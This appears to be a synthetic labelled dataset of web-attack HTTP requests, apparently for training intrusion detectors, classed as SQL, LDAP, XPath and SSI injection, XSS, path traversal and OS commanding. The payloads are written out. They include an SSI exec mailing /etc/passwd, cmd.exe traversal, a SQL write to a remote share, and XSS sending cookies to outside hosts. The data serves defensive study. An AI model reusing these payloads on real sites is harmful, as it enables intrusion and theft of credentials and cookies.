Referer: http://IUbo.ch/t5esen/r4egham/tsys/um1AitC4/aeeesrdd.php
TE: gzip;q=0.4,deflate
Trailer: Host
User-Agent: Mozilla/2.0 (X11; U; Open BSD i586 6.4; Ib-cx; rv:8.2.3) Gecko/04427480
UA-CPU: MIPS
UA-Disp: 8001,6616,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 793x723
Via: FTP/1.7 43.80.77.249
Transfer-Encoding: sois
Upgrade: enn72/7.1, EYeuT/2.5, saodes/7.2
Warning: 387 www.5rttc.html "iatlob" 
X-Forwarded-For: 236.225.195.192
X-Serial-Number: 017399203750342
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49136
Start - Id: 49279
class: XPathInjection
GET /h763NvQKLhC/eOlJj/euc9vYhCVW7d6Oq3P0/adttmain.aspx?9LTih=c%2FgS%2FeahF%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D9%5D+++++or+%27rnht%27++++%3D+++%27&DaIs=Ckc&DsamUNTGB=45242&0etihsek8U=vbscript%28spl&1v=c%7Eq1%7C%5D-er+4oldocumentf+ HTTP/1.1
Host: www.i5un.biz
Connection: eqma
Accept: text/*;q=0.5, image/png, application/postscript;q=0.7
Accept-Charset: *;q=0.4
Accept-Encoding: compress, deflate
Accept-Language: *;q=0.0
Cache-Control: min-fresh=7
Client-ip: 214.56.183.168
Cookie: nzr=:ibetweene+
Cookie2: $Version="39"
Date: Tue, 15 Nov 05 16:15:34 CET
ETag: W/"JPmR9_9ZPrUkFgwSt4"
Expect: 100-continue
From: ttIceawb@smJnerkeg.com
If-Modified-Since: Fri, 30 Apr 04 05:30:26 UTC
If-Unmodified-Since: Thu, 10 Feb 05 16:45:27 UTC
If-Match: "Oq2syz7Gl3Ss1.1dfLqH"
If-None-Match: "wHnvcYP2A52kht@BYD4P"
If-Range: *
Max-Forwards: 168
MIME-Version: 9.5
Pragma: 3nfvts='i2E'
Proxy-Authorization: NTLM ZWFTNWlvZXFpZXV0YWhuMHVuZGhhZG9xZXEwNW4wbmtkbnFu
Authorization: NTLM b29IZXNhZWROemV5ZW50ZTI3c2lhZXRhamVvdGxjZTMzaWJlRXkzdG5tT3E=
Range: 305761-528973
Referer: /4zbOet/oascs0/reWpnte/k5mhTsef.gz
TE: trailers
Trailer: Trailer
User-Agent: Mozilla/2.0 (Windows; U; Win98 1.6; aa-ci; rv:5.3.5) Gecko/64464813
UA-CPU: x86
UA-Disp: 3091,890,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 666x0440
Via: FTP/9.7 144.243.219.213, oDael/3.5 www.8aQcmS.css
Transfer-Encoding: gzip
Upgrade: iedn/7.3, nh9e/5.6, 2l7Pr/8.1
Warning: 952 www.opnaAke.tiff "wdiercrcmppwienapny" 
X-Forwarded-For: 188.15.164.72
X-Serial-Number: 15070707581939695
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49279
Start - Id: 36311
class: PathTransversal
GET /itUsjW3K/sZK/d_P/aionailaey/183a/szfyr.exe?ee7hu8srhieyd=%2Fetc%2Fpasswd&@aOIQqN=lng5n2hUae&edntSntloa=cwnifiLvwst3autta&toen=0148&b7idomhepsnnrdb=362&yaterby=tshr8e&rLauKXGV3=026 HTTP/1.1
Host: 85.100.239.226
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: x-mac-korean;q=0.2, windows-1255, iso-8859-7
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Client-ip: 145.8.91.154
Cookie: v3offnn=eardla;GnetcatPfR=rWIBHlH_;aapOhd84deopG=pwaqjr;logYyg.kg=speo7rtmctan1eodt;4fvNroOowls1s=eAes;o2ikyysT=h1
Cookie2: $Version="6"
Date: Tue, 04 Oct 05 17:25:37 GMT
ETag: "PR@C.gH8sSbya5og"
Expect: 100-continue
From: 5ygo@eiccrasaq.org
If-Modified-Since: Sat, 18 Nov 06 02:09:20 CET
If-Unmodified-Since: Sun, 20 Aug 06 14:21:54 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 24 Apr 04 07:49:41 GMT
Max-Forwards: 4677
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: tioya ejsnoe=rrNti
Authorization: evam nee2qcse=getlnisr
Range: -24492,6727-90720
Referer: http://rrnjma.gov/ti6g/a5c3/fs23aa/caqa.cgi
TE: chunked,deflate;q=0.4
Trailer: Cache-Control
User-Agent: rnRUk0KM7 http://www.Ert4wwp.st
UA-CPU: MIPS
UA-Disp: 505,9391,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 645x5981
Via: 1.6 www.erott.gif
Transfer-Encoding: gzip
Upgrade: oafi/4.5
Warning: 925 www.seESe.gif "aoh3bha8hrc" 
X-Forwarded-For: 87.172.119.89
X-Serial-Number: 10989646571343616
----: -------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 36311
Start - Id: 40062
class: SSI
GET /qU/F8vh/ouZRef2F4bZEL.htm?mBw=3331&slgGmbtrlea=joa%3E0tlposition2&mznlzan=24&updategaZ0=52553&3r4sgty3cav=a+hch&lj1ttEpb7B=3&sii=t_Bto3o_OK%40&nlnpexelynr8Nc=rw7winntt&r3bw9eiel3q=%3C%21--+%23exec+++cmd%3D%22%2Fbin%2Fmail+++++th.com+++%3C++%2Fetc%2Fpasswd%22--%3E&st=ezlu&enxmeohysl8lirh=3&teonef=ldrsmoeeswi HTTP/1.0
Host: www.zgeCtTfero.cz
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: i5-br;q=0.4, tel-6sA;q=0.4, o-na;q=0.1, ElTs-taDsow0
Cache-Control: no-transform
Client-ip: 152.166.126.235
Cookie: 2mwcmOKnKEHe=pelogmhs
Cookie2: $Version="35"
Date: Sat, 30 Dec 06 16:48:55 CET
ETag: W/"kZJu3IoTYGcSKFBiD@c"
Expect: ursla2l
From: atth5@DlahcYr4ai.cz
If-Modified-Since: Wed, 21 Jun 06 15:57:29 GMT
If-Unmodified-Since: Mon, 07 Jul 08 13:22:33 CET
If-Match: "9gbv7i7@uiRTCb3o"
If-None-Match: *
If-Range: Wed, 17 Oct 07 24:29:26 GMT
Max-Forwards: 98
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Basic NnRpYWQ6cmU3cnRxMQ==
Authorization: NTLM bmxub0pkRHN3ZHRuYWlsYXJ0dXIzbm9udGNNNmlpcm9oaGlmcmVyNmVpZEFTc2ll
Range: 0-,976-,082-
Referer: /e6ii/ttQwtd.wav
TE: deflate,gzip;q=0.7,trailers
Trailer: If-Unmodified-Since
User-Agent: 1slenrautd/0.1.5.9.9
UA-CPU: PowerPC
UA-Disp: 665,2462,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 8002x1361
Via: FTP/3.7 www.pnXQap.html
Transfer-Encoding: deflate
Upgrade: eyee/8.5, tmg/7.0
Warning: 301 www.aNxatsl.gif "mcn8ho5" "Mon, 26 Jan 09 23:46:07 CET"
X-Forwarded-For: 67.12.1.93
X-Serial-Number: 827844806951903095
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40062
Start - Id: 37958
class: LdapInjection
GET /7urt4ay/nhheyehTuaKYg/U8YTcm-5/ZayOirmswMc4/e2FwoMtj.6isL7GQ/N9.YscriptLvbscripthttpi6q1/hA/reShcBnfeoflo/C9mZBstyleGdfONR_Ev/elds/v3wif0sgsihasiae.msf?oWsnyesN=t&buSR=eDOrTGd&oz=bin92mggwinntohu%25&twe1alea=2&AWsystemq1lNKRJ=ve&Ne=%25nsamCklpxanuhq%3FnDus&otosya7he=CH%27o&3YIc=Yrorddca8teit1t&jisniied=71&sh=545324&passthru0fxuXlJ=cehritITn&4K=mqiugoohu&z6ltretsieea=9799%29%28%26%28objectClass%3Dtla%29%28%7C%28sn+%3D++++Mt%29%28cn%3DSme++++J*%29%29&atle3n=s7f463dkiol HTTP/1.0
Host: 39.45.26.226:102
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 106.160.89.209
Cookie: zh=eSsaqWdr0y3  ;dnrnLwqqglaeet8=f zptaahsecowr;noesuAz=937263;Iebeii=woa;eiOintla4l=ed;atles=Hdnoanie
Cookie2: $Version="12"
Date: Thu, 29 Jun 06 21:21:59 UTC
ETag: W/"AMXW7dHrAGf@J@P3v-"
Expect: psersns=esanan
From: nteal@6riIt.fr
If-Modified-Since: Thu, 31 May 07 12:33:49 CET
If-Unmodified-Since: Tue, 18 Jul 06 23:11:30 GMT
If-Match: "zuCPuCjPYUsijsXd7C8d"
If-None-Match: "C@brXdppUgnX0.Jws.CG"
If-Range: "_ca5UBQDF7Ac8kaj"
Max-Forwards: 606
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: ndeT l2ftnt=toae
Range: 80461-
Referer: http://erleOZi.ch/c4Ufh/T8itrhQr.tiff
TE: trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/2.6 (X11; U; Linux i386 8.0; ni-ca; rv:1.3.0) Gecko/43096404
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 8848x2681
Via: 3.4 227.238.161.80:3, 8.1 2.242.230.209
Transfer-Encoding: compress
Upgrade: meng/6.1, eFlrhd/9.3, 8sNla/8.7
Warning: 700 www.fia1N.gif "guys2ngneaoLs2joonsi" "Fri, 30 Dec 05 15:06:31 CET"
X-Forwarded-For: 36.237.252.182
X-Serial-Number: 8812591
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37958
Start - Id: 43816
class: OsCommanding
GET ..%u00255c..%u00255cwinnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.VicnrrxnC9.org
Connection: close
Accept: application/*, application/*
Accept-Charset: shift_jis;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: max-age=3313
Client-ip: 190.28.146.165
Cookie: 1jnidhnhicohcla=au|;tcew6sp=518477;aee=rrwxld;Eq1D=tlQZs3SyzA
Cookie2: $Version="513"
Date: Sun, 13 Jul 08 21:01:56 UTC
ETag: "8nGE58BP@Fz64tFs"
Expect: 100-continue
From: cw3btxir@daeQnmosye.biz
If-Modified-Since: Mon, 08 Aug 05 14:15:59 CET
If-Unmodified-Since: Sun, 19 Nov 06 05:12:38 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 421
MIME-Version: 5.3
Pragma: adets='coCaujeo'
Proxy-Authorization: R7A0ap at1adanm=oflLhkr
Authorization: Digest opaque="aias"
Range: 7246-,-7950
Referer: http://sereh.net/hotdej/Aupgayme/10chtYT/ocafsOht/Rjdo.php3
TE: deflate;q=0.8
Trailer: Accept-Charset
User-Agent: ae2eh/8.2.1.5
UA-CPU: PowerPC
UA-Disp: 7509,580,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 057x9927
Via: 0.7 www.itme.htm
Transfer-Encoding: otoh7
Upgrade: ren9do/0.2, 2ieds/4.2, a63ht/7.8, ezecpO/2.9
Warning: 247 246.53.212.201 "ekzocqatldrtah" "Tue, 01 Sep 09 06:23:34 CET"
X-Forwarded-For: 33.130.8.36
X-Serial-Number: 055444693738
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43816
Start - Id: 44058
class: OsCommanding
GET ..%%35c../winnt/system32/cmd.exe? HTTP/1.1
Host: 50.48.246.104
Connection: close
Accept: */*;q=0.4
Accept-Charset: x-mac-korean;q=0.7, iso-8859-9;q=0.9, x-mac-turkish, windows-1258
Accept-Encoding: gzip;q=0.6, deflate, deflate
Accept-Language: ebteao-ie, don7io-e9ot9tj;q=0.9, o0s9tnu-fwouei;q=0.3, cu-12oreeps
Cache-Control: no-store
Client-ip: 11.19.174.55
Cookie: znbp0Yhn1og=nJTNXk@DBB
Cookie2: $Version="43"
Date: Sat, 14 Jan 06 02:56:17 GMT
ETag: W/"3JMdpZKPsFZtfWe4VBfh"
Expect: 9ngplMf=itmleued
From: ctHO@rsrvtl.cz
If-Modified-Since: Thu, 06 Jan 05 22:06:07 CET
If-Unmodified-Since: Wed, 21 May 08 08:29:17 GMT
If-Match: *
If-None-Match: "_fd0fyKesV3Tnmi"
If-Range: "XIdU6YFkNmv.RQLm9@"
Max-Forwards: 6
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: NTLM dDF0aE5xMXl5dGV0bng5c2wycmFvdGlhYWF3cjZSbWtubXV0bQ==
Authorization: haih yoils=Rrfosi0
Range: -0
Referer: /otthcdl.fgf
TE: trailers,chunked
Trailer: If-Range
User-Agent: itNna9 (csr1XJxph)
UA-CPU: PowerPC
UA-Disp: 6409,6413,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 4959x090
Via: FTP/0.0 20.93.153.238
Transfer-Encoding: compress
Upgrade: tpnTf/6.7, GatRth/6.1, eyss8u/8.0
Warning: 175 26.216.110.35 "tt5rn4Ks" "Fri, 26 May 06 17:19:02 GMT"
X-Forwarded-For: 201.145.60.10
X-Serial-Number: 412280187
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44058
Start - Id: 36414
class: OsCommanding
GET /Erhzirralhr8nanuedJ/LcWYwcF_cmX-aK4/zISelN.Px97/du/yjHgQ.exe?xtermTDb=28&souei0u=%27%3B+++++EXEC+++++master..sp_makewebtask++%22%5C%5C194.151.87.152%5Cdh%5Cee.jpg%22%2C++++%22SELECT+*++FROM+++++INFORMATION_SCHEMA.TABLES%22&uons0tosENxXas=eTad5u&hoesrhilNlT1qr=922189&fsednyer=1591127674 HTTP/1.0
Host: 32.127.93.79
Connection: no0engN
Accept: audio/*;q=0.6, text/*, video/*
Accept-Charset: x-mac-japanese
Accept-Encoding: 
Accept-Language: *
Cache-Control: 8paqedia=r
Client-ip: 133.214.196.239
Cookie: jprocessing-instructionG3.QKWNunioniS=me 8corEnetp
Cookie2: $Version="16"
Date: Tue, 25 May 04 24:25:26 UTC
ETag: W/"Zs1kA2sdnln57Kh"
Expect: 100-continue
If-Modified-Since: Tue, 08 Jun 04 04:05:10 CET
If-Unmodified-Since: Tue, 30 Jan 07 20:09:09 CET
If-Match: "qQ7FUbjuRYoA3.xk@vHL"
If-None-Match: "fSPHXRMjPU.XynlmrRPs"
If-Range: "KgjMH2dZUc13@9G77g-"
Max-Forwards: 2
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: NTLM bmlvMHVsbHB0bGNvbGF0aW5XYmphZW5MYXNvdGlvRXJBaGd3NGVmZ20=
Authorization: NTLM Y09ybmk3b0lnYXBvaXFhampscG1rMnNzbGpleXZtZXJlZndtZGxvYXZk
Range: 15-,7348-823
Referer: http://YrsE9.ch/fety.exe
TE: trailers,gzip;q=0.7
Trailer: From
User-Agent: ud8sa0 (ep45-q9; eGrL6mE-)
UA-CPU: PowerPC
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 811x0670
Via: HTTP/5.2 131.19.139.57:0220, 8.3 www.reae.jpeg
Transfer-Encoding: gzip
Upgrade: ehax/0.1, twoX/5.2, amhin/1.7, Nyuis8/4.4, rta/1.3
Warning: 271 125.50.84.12 "ieans4Sb3nfr1aNeeTba" "Fri, 16 Dec 05 02:23:13 UTC"
X-Serial-Number: 492730775848
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 36414
Start - Id: 40478
class: SSI
GET /rnleqerqGlttMrV4/9vgmee/t72oc6meaahek/se/hr47h256N/fls7050/tmowPEenroreeHslss/nlxvocDkzKNXR/5SB1samNY-D.jpeg?temzO0=%3C%21--%23include+++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22+++--%3E&j@wBWNF.@i@=o1BNeOhO HTTP/1.0
Host: 26.97.2.90:80
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: e-gsenbt6o;q=0.2
Cache-Control: max-stale
Client-ip: 207.160.226.22
Cookie: 7poRla56si=88277634
Cookie2: $Version="386"
Date: Mon, 11 May 09 12:49:46 GMT
ETag: W/"FGqTlYRcSn07Vq9zDb"
Expect: 100-continue
From: Meara5ka@omiicnkiy.st
If-Modified-Since: Wed, 23 Sep 09 23:56:41 GMT
If-Unmodified-Since: Sat, 04 Sep 04 08:52:46 CET
If-Match: *
If-None-Match: "9FKU8u_.GqW6Spnj"
If-Range: *
Max-Forwards: 11
MIME-Version: 6.5
Pragma: N=5exvoren
Proxy-Authorization: Gdzho e8cm6Rl=tdiaor
Authorization: Digest algorithm=MD5-sess
Range: 6740-758,0802-
Referer: http://www.p6iueg.ch/ecel9iis/kiaMmra/t7rja6/nnet4/afae7.conf
TE: trailers,deflate;q=0.0,trailers
Trailer: Host
User-Agent: Mozilla/0.3 (compatible; Konqueror/1.8; Solaris; lae7aaRcmw)
UA-CPU: PowerPC
UA-Disp: 609,4490,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 7701x851
Via: HTTP/2.6 www.tuaktt.js:5
Transfer-Encoding: deflate
Upgrade: Fgc8t/0.2
Warning: 565 www.mo1i.jpg "difinztedvtd" 
X-Forwarded-For: 50.57.73.228
X-Serial-Number: 98565372421828
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40478
Start - Id: 38548
class: LdapInjection
GET /isHz/a4/wjgdn6glhLoiatDuAsoo/a9x.OTAZ27T2T5/jP.8YL/8OCZ-4Dsemsf.cgi?etah5DasshatoxO=%29++++%28++%7C%28++++cn%3D*o%27brien*%29%28mail%3D*o+++%27brien*%29++++&232f=17954614&dooh6discttn=4340532&i3iOdcfrte0y=hlservicesebcS&iviuDie1daveyo=uwqCIz2Je%40&Mtkeh2co=sl9zu%7Eknrytk&2nlEecaaePrcxzy=5&xefjrta=y+vwhereue%27child%3E&ehitidbh5K=nVx4aW7ZF8&ntige3sdr=628&tonm=omTzeNqtrsi1 HTTP/1.0
Host: www.iewdzi.be:80
Connection: keep-alive
Accept: video/*;q=0.4
Accept-Charset: windows-1250, iso-8859-2
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=43450
Client-ip: 137.169.169.214
Cookie: LiRmckNfromz=59723972;seeoiaod8eio=60;nMat=21
Cookie2: $Version="697"
Date: Sat, 07 Apr 07 15:08:16 CET
ETag: W/"Mx20H@ckCBRko3Mhzz"
Expect: 100-continue
From: zttnih@4elXnnltkb.org
If-Modified-Since: Mon, 29 Jun 09 13:04:30 GMT
If-Unmodified-Since: Mon, 12 Apr 04 18:58:46 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 10 Feb 06 03:23:18 CET
Max-Forwards: 0987
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: NTLM Z2RpZWZmYTBGUG1yQWRpSUhuUnQ5SjNpbzNzSWxuZXJVYXRzdGlvZW1veGxJbGlh
Authorization: Digest cnonce="aipuncn4"
Range: 447-,158917-
Referer: /spWe.exe
TE: gzip
Trailer: If-Range
User-Agent: Mozilla/5.0 (compatible; stkuTslre; Linux i386; etcjtnyel; ieba)
UA-CPU: 68000
UA-Disp: 967,395,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 8726x4401
Via: HTTP/1.4 5.147.77.143, HTTP/3.6 35.117.154.81, FTP/4.6 www.os8e.htm
Transfer-Encoding: deflate
Upgrade: ghm/2.7, nshsr/6.5, e5b/0.7, Iosom/6.6
Warning: 459 www.duAsdn.jpeg "nz6rni" "Thu, 23 Dec 04 09:07:50 UTC"
X-Forwarded-For: 157.225.217.71
X-Serial-Number: 30599
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38548
Start - Id: 48003
class: XSS
GET /mCformV/4nIKMbC/9P/ihasr2y/fkv/nrnhaerbQbate4re/h9AX-QVvfm5O4.W/yy6xAkm9CVuY51fl61is.jpg?9tEccledtre=oh&gat=trjndtiisLa&acengpi5eB7eet=2&suaK8maeeete=%3Ca+++href++%3D+++%22+++++about%3A%3Cs%26%2399%3Bript++%3E%5Bdocument.location.replace%28%27http%3A%2F%2Fwww.ettans.com%2Fcgi-bin%2Fanieat.cgi%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript+++%3E+%22++++%3E HTTP/1.1
Host: www.e9oef.com:80
Connection: hijBysa
Accept: */*;q=0.1
Accept-Charset: iso-8859-8-i, iso-8859-1
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 192.143.189.93
Cookie: 2oaai=imniostnsem;dZho=61818406;oOeootRo=5yi0hxmlsmceo)n7; n;6p1qaLel=234;kmTfd=&Ep
Cookie2: $Version="868"
Date: Mon, 16 Jun 08 20:42:46 GMT
ETag: "@VXDu5S@lH01Yi79I"
Expect: 100-continue
From: n25cwrN@ae4ttib.uk
If-Modified-Since: Fri, 18 Jul 08 23:49:05 UTC
If-Unmodified-Since: Fri, 21 Sep 07 10:59:41 UTC
If-Match: "u0m@qrPn4@Mtf@KRCl"
If-None-Match: *
If-Range: Fri, 23 Nov 07 17:24:10 GMT
Max-Forwards: 5523
MIME-Version: 0.5
Pragma: no-cache
Proxy-Authorization: NTLM YWxlQWN1ZGJ6ZG5iZXJheXRodFJidXBlRXc2N2NibXBodHVLNWVqb0g=
Authorization: Digest algorithm=sinirvd
Range: 545-32,248-,104203-4203
Referer: /iusaa/rT07w3i/oueUng/eerqg.dll
TE: deflate
Trailer: User-Agent
User-Agent: wyAaOlT
UA-CPU: StrongARM
UA-Disp: 212,5646,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 948x768
Via: HTTP/0.5 www.ehlips.jpeg
Transfer-Encoding: c5Aso; ttrtmr=sOyvain
Upgrade: hrsloe/4.3
Warning: 549 www.7tn2ri.jpg "cr4ayetrlreo6ceei3r" 
X-Forwarded-For: 186.104.154.65
X-Serial-Number: 4179007460908292246
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48003
Start - Id: 46656
class: XSS
GET /yncac7te/rErdSo3H3hsar2ahx.sh?i4rTrCbwimoqva=7461584&aasi=778495&sllrcieAanstncn=arQfatFhc&shdhahailt=gsrmAozenvndnsoib&y.CO4m=e.99&dctntjlh=38609 HTTP/1.0
Host: www.bs0odyl.fr
Connection: keep-alive
Accept: text/*;q=0.8, audio/x-wav
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: Raruqoe-m2;q=0.3, xeh-ce, rezSr-OrO1, hgp-e6r;q=0.2
Cache-Control: max-age=95
Client-ip: 44.75.92.91
Cookie: kgvpqeuehe8Ftw=eiae~;-g_updateoQmeta0etc=<img  dynsrc   ="     javascript:    [document.location.replace  ('http://www.atndin.com/cgi-bin/veesde.cgi'+document.cookie);]    "  >;Ds1etgnkwgmUuif=h;sxcTzSjrregi=EhiuxmlxsMyreOl;8rvu=7lvlaadl;pineeux6e7eiir=ta:Tl
Cookie2: $Version="911"
Date: Sun, 11 Sep 05 15:36:02 CET
ETag: W/"UZZb2JZhOTt71FjvfCKp"
Expect: hvBa=iesaIq
From: iam9mt@lo1hek.gov
If-Modified-Since: Thu, 17 Nov 05 09:20:59 CET
If-Unmodified-Since: Fri, 21 Aug 09 11:35:42 GMT
If-Match: "_6L_0XAAC.D@QRanStuw"
If-None-Match: "8NyaG1na-35@0_H"
If-Range: Fri, 21 Jan 05 14:33:34 UTC
Max-Forwards: 08
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.e3lhteim.be/eyfce/avpt/3ltem4wi/6e8iumm.mp3
Authorization: Basic aWRlcGgzOnRlZHM5
Referer: http://www.ejrlfgja.be/axiw0hr/xlra.jpeg
TE: deflate;q=0.0,trailers,chunked;q=0.5
Trailer: TE
User-Agent: susoari
UA-OS: WinNT
Via: tsb/3.7 96.51.7.234
Transfer-Encoding: identity
Upgrade: pesis/7.5, lqrttT/4.6, bTsote/3.0, cstc/2.2, peotn/4.0
Warning: 466 152.152.48.226 "ecjo" 
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 46656
Start - Id: 41317
class: SqlInjection
GET /0HTuUAhykCLCAxo/6DabqO0VnxreplaceFo@X/l7WaJ1BWHLjSDW2r@.g/tADbvReFJN/aQGu/rdaohstgLie5ydUneaca/sUHbcpp/-5RgJ9@BiATcU.gif?.Elog2=4291435827&metagU-FV-m4=heei&D0ttrhta=7348371 HTTP/1.1
Host: 255.244.163.83
Connection: Dttlpi
Accept: application/postscript;q=0.9, application/rtf;q=0.4
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: max-age=1
Client-ip: 189.55.45.50
Cookie: adhqxefuuam=1039940755;werE=eiFSmQ;eWwtdeuIsrIbt= S e;rrbNnYmt=;  exec  get_cust(   'x'' union    select    object_name,object_type,''x''  from  user_objects     where ''ehehpCrrhh''    = '' ');
Cookie2: $Version="7"
Date: Sat, 27 Nov 04 22:26:22 UTC
ETag: W/"xZMbuEGG15vA5lGX"
Expect: 100-continue
From: jtwc@er22t6e.st
If-Modified-Since: Wed, 14 Feb 07 02:19:15 UTC
If-Unmodified-Since: Mon, 30 Jun 08 24:27:36 GMT
If-Match: "myRIgdW9EyXxQrO9VM"
If-None-Match: *
If-Range: "kRsDH9J48B66QuEX.CJ9"
Max-Forwards: 662
MIME-Version: 4.9
Pragma: al5u='vyhhs2h'
Proxy-Authorization: Basic bm9lSDpDZWN1
Authorization: Digest opaque="cdsz1t9e"
Range: -5510
Referer: /teNour/sore/pU9a/DTndAEht/itahp1h5.cgi
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/2.0 (compatible; MSIE 1.6; Open BSD i586; aNfh7wos; g5a1t; rtfsmlRjht)
UA-CPU: 68000
UA-Disp: 111,881,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 9326x2155
Via: 5.7 www.rtntsnyn.html
Transfer-Encoding: identity
Upgrade: Ylhk/4.7
Warning: 606 67.137.176.51 "isNlwel" "Sat, 21 Oct 06 12:47:41 UTC"
X-Forwarded-For: 93.157.11.88
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41317
Start - Id: 37613
class: LdapInjection
POST /e1attshssarnasido/s7sjtAnidntseeo/sFgNdiK.qTeV/9y30oLxdK5wvb9jrWg/MH6plV80/anmi/0KTwLkOWNBuCKNsystem.asp? HTTP/1.1
Content-Length: 222
Content-Language: yyoo,z
Content-Encoding: identity
Content-Location: http://www.i5o8d.cz/r6n0n/dqtdhosa/sc0r.php4
Content-MD5: emZhd2dtNWFpZGVvSmx1YQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 02 May 05 02:25:46 GMT
Last-Modified: Wed, 17 Jun 09 23:05:25 GMT
Host: www.muipdSso.biz
Connection: keep-alive
Accept: video/quicktime
Accept-Charset: *
Accept-Encoding: *
Accept-Language: eBe7rnn-eeyess, kee-n2
Cache-Control: only-if-cached
Client-ip: 34.23.57.157
Cookie: nCtfOoEaLifee=741;lp=2
Cookie2: $Version="61"
Date: Sat, 22 Dec 07 01:48:44 CET
ETag: "6t0u8o_yH@NZvJitW"
Expect: 100-continue
From: tiwatv@kDh9.de
If-Modified-Since: Wed, 18 Aug 04 15:21:39 GMT
If-Unmodified-Since: Fri, 30 Mar 07 15:18:20 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 08 Apr 10 19:37:53 UTC
Max-Forwards: 92
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: Digest username="pitaah"
Authorization: 9zero hxpb=aiseetc
Range: 9-3321,97916-131
Referer: http://www.eeqcpfH.gov/h2eu/ii9e/hdUaDin.msf
TE: trailers
Trailer: Accept-Language
User-Agent: p23eu/5.7
UA-CPU: PowerPC
UA-Disp: 2548,1743,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 770x317
Via: 0.9 68.127.98.228, pSlge/6.8 www.makIEa.css, 3.9 www.nsaieape.png:1603
Transfer-Encoding: deflate
Upgrade: cRHe/8.3, tetss/9.8, nnhey/9.3, srrh/1.0
Warning: 019 53.184.51.92 "gqnaoerdito" 
X-Forwarded-For: 20.191.23.124
X-Serial-Number: 220877773
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

anoTremgne5nr=nt\ stdinomiz &cXbbRMM9m=4661&legjm5a=Geoav5rtEte9n&RunofnSMrtc4zl=en/josn&xqE=626846&ro7h=s6SAe2eIE&Z8grs=)  (   |    (Ei=r0rji*)&O0benean8hn8im=i07LDgsij&onzdcdoo1dc=02&0ZZCX@VF=nn4e;bo@

End - Id: 37613
Start - Id: 42286
class: SqlInjection
GET /oaAR_MC@QL_fB6.jpeg?tAlfmiw9tb=OR+++590%3D590&7wdeaanabd=2sh3v48%3C0&fnhesep=tPnirlriotwekseeMh HTTP/1.1
Host: www.oEnbni.biz:9681
Connection: close
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: deflate, deflate, deflate;q=0.0, deflate, deflate
Accept-Language: Ei0iob-Timybeo, io-s, aaqesrT-D9my;q=0.8, aa23aesa-SAo;q=0.5, aaiL1-isca;q=0.8
Cache-Control: no-transform
Client-ip: 94.165.178.34
